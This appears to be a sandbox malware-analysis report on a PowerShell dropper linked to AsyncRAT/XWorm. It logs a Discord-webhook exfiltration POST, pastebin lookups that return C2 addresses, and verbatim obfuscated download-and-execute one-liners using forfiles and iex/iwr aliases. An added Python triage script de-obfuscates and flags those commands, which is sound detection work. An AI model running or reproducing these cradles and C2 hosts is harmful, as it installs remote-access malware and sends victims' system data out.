                                                                                    Data Ascii: Set-Cookie: _cfuvid=I6Omw_YaJ7hPbG7zuDHnXD_hU6Aiyr.9utITvTtdb5A-1729000458397-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304ce009986b61-DFW


                                                                                     Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                     7          | 192.168.2.9 | 49723       | 162.159.138.232 | 443              | 5812 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                     Timestamp               | Bytes transferred | Direction | Data
                                                                                     2024-10-15 13:54:25 UTC | 311               | OUT       | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Content-Type: application/json
                                                                                    Host: discord.com
                                                                                    Content-Length: 295
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 13:54:25 UTC295OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 74 69 6e 61 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 53 54 50 35 53 45 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46 41 4c
                                                                                    Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** STP5SE\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - FAL
                                                                                     2024-10-15 13:54:25 UTC | 1356              | IN        | HTTP/1.1 204 No Content
                                                                                    Date: Tue, 15 Oct 2024 13:54:25 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    set-cookie: __dcfduid=fd5d4b728afc11ef8a3d4ea617983865; Expires=Sun, 14-Oct-2029 13:54:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1729000467
                                                                                    x-ratelimit-reset-after: 1
                                                                                    via: 1.1 google
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z6%2FddeAA4NhMdFEbPDQWzPsP1wzl9Wqon1dskdActn4Cl%2F%2Badre403n4GcHMR5BLo05o7H2iidJ2JLQuGV9yU1MiDGn6ISln71tfwbII7yif66FXTAl%2BaAJ4gk4B"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                    Set-Cookie: __sdcfduid=fd5d4b728afc11ef8a3d4ea6179838654323ffe784223a2c6ec448ad7224e415fb80696181a33090613456601daec4eb; Expires=Sun, 14-Oct-2029 13:54:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                    Set-Cookie: __cfruid=10dbd1eb829064c3644d90849112d605459fb980-1729000465; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    2024-10-15 13:54:25 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6b 65 36 69 2e 4a 74 55 67 4c 50 48 33 76 4f 4e 37 78 69 46 6d 5f 2e 57 76 75 35 37 6a 64 41 53 7a 73 5f 72 61 48 39 5f 42 68 63 2d 31 37 32 39 30 30 30 34 36 35 39 31 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 64 30 64 63 66 37 38 65 37 61 32 2d 44 46 57 0d 0a 0d 0a
                                                                                    Data Ascii: Set-Cookie: _cfuvid=ke6i.JtUgLPH3vON7xiFm_.Wvu57jdASzs_raH9_Bhc-1729000465910-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304d0dcf78e7a2-DFW


                                                                                     Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                     8          | 192.168.2.9 | 49724       | 104.20.3.235    | 443              | 5584 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                     Timestamp               | Bytes transferred | Direction | Data
                                                                                     2024-10-15 13:54:32 UTC | 74                | OUT       | GET /raw/zNCj2Utm HTTP/1.1
                                                                                    Host: pastebin.com
                                                                                    Connection: Keep-Alive
                                                                                     2024-10-15 13:54:33 UTC | 397               | IN        | HTTP/1.1 200 OK
                                                                                    Date: Tue, 15 Oct 2024 13:54:33 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    x-frame-options: DENY
                                                                                    x-content-type-options: nosniff
                                                                                    x-xss-protection: 1;mode=block
                                                                                    cache-control: public, max-age=1801
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 116
                                                                                    Last-Modified: Tue, 15 Oct 2024 13:52:37 GMT
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d304d3c8b71e5f2-DFW
                                                                                     2024-10-15 13:54:33 UTC | 34                | IN        | Data Raw: 31 63 0d 0a 78 72 66 63 78 69 71 75 71 63 70 71 68 61 2e 64 64 6e 73 2e 6e 65 74 3a 34 34 31 31 0d 0a
                                                                                    Data Ascii: 1cxrfcxiquqcpqha.ddns.net:4411
                                                                                     2024-10-15 13:54:33 UTC | 5                 | IN        | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                     Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                     9          | 192.168.2.9 | 49725       | 104.20.3.235    | 443              | 5584 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                     Timestamp               | Bytes transferred | Direction | Data
                                                                                     2024-10-15 13:54:33 UTC | 50                | OUT       | GET /raw/6db99fAK HTTP/1.1
                                                                                    Host: pastebin.com
                                                                                     2024-10-15 13:54:33 UTC | 397               | IN        | HTTP/1.1 200 OK
                                                                                    Date: Tue, 15 Oct 2024 13:54:33 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    x-frame-options: DENY
                                                                                    x-content-type-options: nosniff
                                                                                    x-xss-protection: 1;mode=block
                                                                                    cache-control: public, max-age=1801
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 115
                                                                                    Last-Modified: Tue, 15 Oct 2024 13:52:38 GMT
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d304d417dbc6b85-DFW
                                                                                     2024-10-15 13:54:33 UTC | 23                | IN        | Data Raw: 31 31 0d 0a 34 35 2e 31 34 34 2e 33 31 2e 31 30 35 3a 34 34 33 0d 0a
                                                                                    Data Ascii: 1145.144.31.105:443
                                                                                     2024-10-15 13:54:33 UTC | 5                 | IN        | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Target ID:1
                                                                                    Start time:09:53:20
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1"
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:09:53:20
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff70f010000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:09:53:23
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline"
                                                                                    Imagebase:0x7ff7fac30000
                                                                                    File size:2'759'232 bytes
                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:09:53:23
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5818.tmp" "c:\Users\user\AppData\Local\Temp\thvmfbzv\CSC2C6CB80D24664034BBA8B61A4D73B8EB.TMP"
                                                                                    Imagebase:0x7ff703ea0000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:09:53:59
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                                    Imagebase:0x7ff639210000
                                                                                    File size:23'040 bytes
                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:7
                                                                                    Start time:09:54:00
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\forfiles.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                    Imagebase:0x7ff6e0850000
                                                                                    File size:52'224 bytes
                                                                                    MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:8
                                                                                    Start time:09:54:00
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff70f010000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:9
                                                                                    Start time:09:54:00
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:10
                                                                                    Start time:09:54:00
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:13
                                                                                    Start time:09:54:03
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Unknown_Malware_Sample_Jul17_2, Description: Detects unknown malware sample with pastebin RAW URL, Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:14
                                                                                    Start time:09:54:03
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff70f010000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:15
                                                                                    Start time:09:54:07
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.cmdline"
                                                                                    Imagebase:0x7ff7fac30000
                                                                                    File size:2'759'232 bytes
                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:16
                                                                                    Start time:09:54:07
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A1.tmp" "c:\Users\user\AppData\Local\Temp\s4dvafav\CSC36361158E42F4D2FBFD4DCE2A4FFFFB.TMP"
                                                                                    Imagebase:0x7ff703ea0000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:09:54:08
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\forfiles.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                    Imagebase:0x7ff6e0850000
                                                                                    File size:52'224 bytes
                                                                                    MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:18
                                                                                    Start time:09:54:08
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff70f010000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:19
                                                                                    Start time:09:54:08
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:20
                                                                                    Start time:09:54:08
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

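The process list above shows the full proxy-and-cradle chain: attrib.exe hides the dropped BeginSync.lnk, forfiles.exe /c launches PowerShell without PowerShell appearing as a direct child of the script host, and the one-liner defines Set-Alias (sal) names for iex and iwr (including $env:os, which expands to Windows_NT, so the visible call is WINDOWS_NT rather than Invoke-WebRequest) before pulling the next stage from pastebin.com and raw.githubusercontent.com; csc.exe then compiles C# from %TEMP%, the footprint of Add-Type. The following Python is an added triage example, not part of the Joe Sandbox report: it resolves the aliases back to cmdlet names and flags each indicator over the command lines copied from the list above (constructed sample input). The alias map, paste-host list and the indicator wording are this example's own assumptions.

```python
import re

# Constructed sample input: the command lines copied verbatim from the process
# list above (attrib, forfiles, conhost, the two PowerShell cradles and csc).
SAMPLE_CMDLINES = [
    r'''"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"''',
    r'''"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"''',
    r'''C:\Windows\system32\conhost.exe 0xffffffff -ForceV1''',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)''',
    r'''"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.cmdline"''',
]

# Cmdlets whose aliasing or direct use turns a one-liner into a download cradle.
# Assumption: this short map covers the cradle shapes in this report; extend it
# for other fetch/execute primitives (Start-BitsTransfer, [Net.WebClient], ...).
DANGEROUS_TARGETS = {
    "iex": "Invoke-Expression", "invoke-expression": "Invoke-Expression",
    "iwr": "Invoke-WebRequest", "invoke-webrequest": "Invoke-WebRequest",
    "curl": "Invoke-WebRequest", "wget": "Invoke-WebRequest",
}
# $env:OS is "Windows_NT" on every NT-based Windows, so "sal $env:os iWr" makes
# WINDOWS_NT an alias for Invoke-WebRequest, which the cradle then calls.
ENV_EXPANSIONS = {"$env:os": "Windows_NT"}
# Hosts commonly used to stage the next stage (assumption: partial list).
PASTE_HOSTS = ("pastebin.com/raw/", "raw.githubusercontent.com/", "paste.ee/", "hastebin.com/")

ALIAS_RE = re.compile(r"\b(?:sal|set-alias|nal|new-alias)\s+([^\s;]+)\s+([^\s;]+)", re.IGNORECASE)


def image_name(cmd):
    """Basename of the launched image, quoted or not (lower-cased)."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', cmd)
    path = m.group(1) or m.group(2)
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def alias_map(cmd):
    """Collect Set-Alias definitions, expanding $env: names and alias chains."""
    aliases = {}
    for name, target in ALIAS_RE.findall(cmd):
        name = ENV_EXPANSIONS.get(name.lower(), name)
        target = aliases.get(target.lower(), target)   # handles sal a iex; sal b a
        aliases[name.lower()] = target
    return aliases


def deobfuscate(cmd):
    """Rewrite the command with aliases resolved to canonical cmdlet names."""
    body = ALIAS_RE.sub("", cmd)                      # drop the alias definitions
    for name, target in alias_map(cmd).items():
        canonical = DANGEROUS_TARGETS.get(target.lower(), target)
        body = re.sub(r"(?<![\w$])" + re.escape(name) + r"(?!\w)",
                      lambda _m, c=canonical: c, body, flags=re.IGNORECASE)
    for short, canonical in DANGEROUS_TARGETS.items():  # iex/iwr used directly
        body = re.sub(r"\b" + re.escape(short) + r"\b",
                      lambda _m, c=canonical: c, body, flags=re.IGNORECASE)
    return re.sub(r"\s+", " ", body).strip()


def indicators(cmd):
    """Return the human-readable findings for one command line."""
    found, low, exe = [], cmd.lower(), image_name(cmd)
    for name, target in alias_map(cmd).items():
        if target.lower() in DANGEROUS_TARGETS:
            found.append(f"alias '{name}' hides {DANGEROUS_TARGETS[target.lower()]}")
    deob = deobfuscate(cmd)
    if "Invoke-Expression" in deob and "Invoke-WebRequest" in deob:
        found.append("download cradle: Invoke-Expression over Invoke-WebRequest")
    found += [f"payload fetched from {h}" for h in PASTE_HOSTS if h in low]
    if re.search(r"-windowstyle\s+h(?:id(?:den)?)?\b", low):
        found.append("hidden PowerShell window")
    if exe == "forfiles.exe" and "/c" in low and "powershell" in low:
        found.append("forfiles /c used as a proxy to launch PowerShell")
    if exe == "attrib.exe" and "+h" in low and ".lnk" in low:
        found.append("attrib +h hides a .lnk (persistence artefact)")
    if exe == "csc.exe" and "\\appdata\\local\\temp\\" in low:
        found.append("csc.exe compiling from %TEMP% (Add-Type at run time)")
    return found


def triage(cmdlines):
    """Map each command line to its findings; an empty list means nothing flagged."""
    return {cmd: indicators(cmd) for cmd in cmdlines}


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_CMDLINES).items():
        print(image_name(cmd), "->", hits or "clean")
        if hits:
            print("   deobfuscated:", deobfuscate(cmd)[:120])
```

Resolving aliases before matching is the point: a rule that keys on the literal strings "iex" or "Invoke-WebRequest" never fires on the forfiles one-liner, because the executed statement reads calliT(WINDOWS_NT ...). Telemetry that carries the full command line (Sysmon event 1, Security 4688 with command-line auditing, or PowerShell script block logging, which records the de-aliased pipeline) is what makes this check work.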
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 91e57bbc00e56f859f27636f5b80467da920fabb3ae86629d11cf62ec04f9b19
                                                                                      • Instruction ID: 8cb1ef110f334817d61cc8e5649f319e1197bf56b9cf4e5a62450be8f9cad4aa
                                                                                      • Opcode Fuzzy Hash: 91e57bbc00e56f859f27636f5b80467da920fabb3ae86629d11cf62ec04f9b19
                                                                                      • Instruction Fuzzy Hash: E3F18430508A4D8FEBA8DF28C8557E97BE2FF54350F04427AD85DC7296DB38A945CB82
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9575a85a3a8b10eab75d863aea3254ea11302af6848ed1dc47700f27f889dadd
                                                                                      • Instruction ID: c2e2d95e38db7467d9a62d945279f6f1b9076412ba16bf805320631314a6e7ae
                                                                                      • Opcode Fuzzy Hash: 9575a85a3a8b10eab75d863aea3254ea11302af6848ed1dc47700f27f889dadd
                                                                                      • Instruction Fuzzy Hash: 47E1A330908A498FEBA8DF28C8557E97BE2FF54350F14427AD85DC7296DB789841C782
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1931160991.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bJ
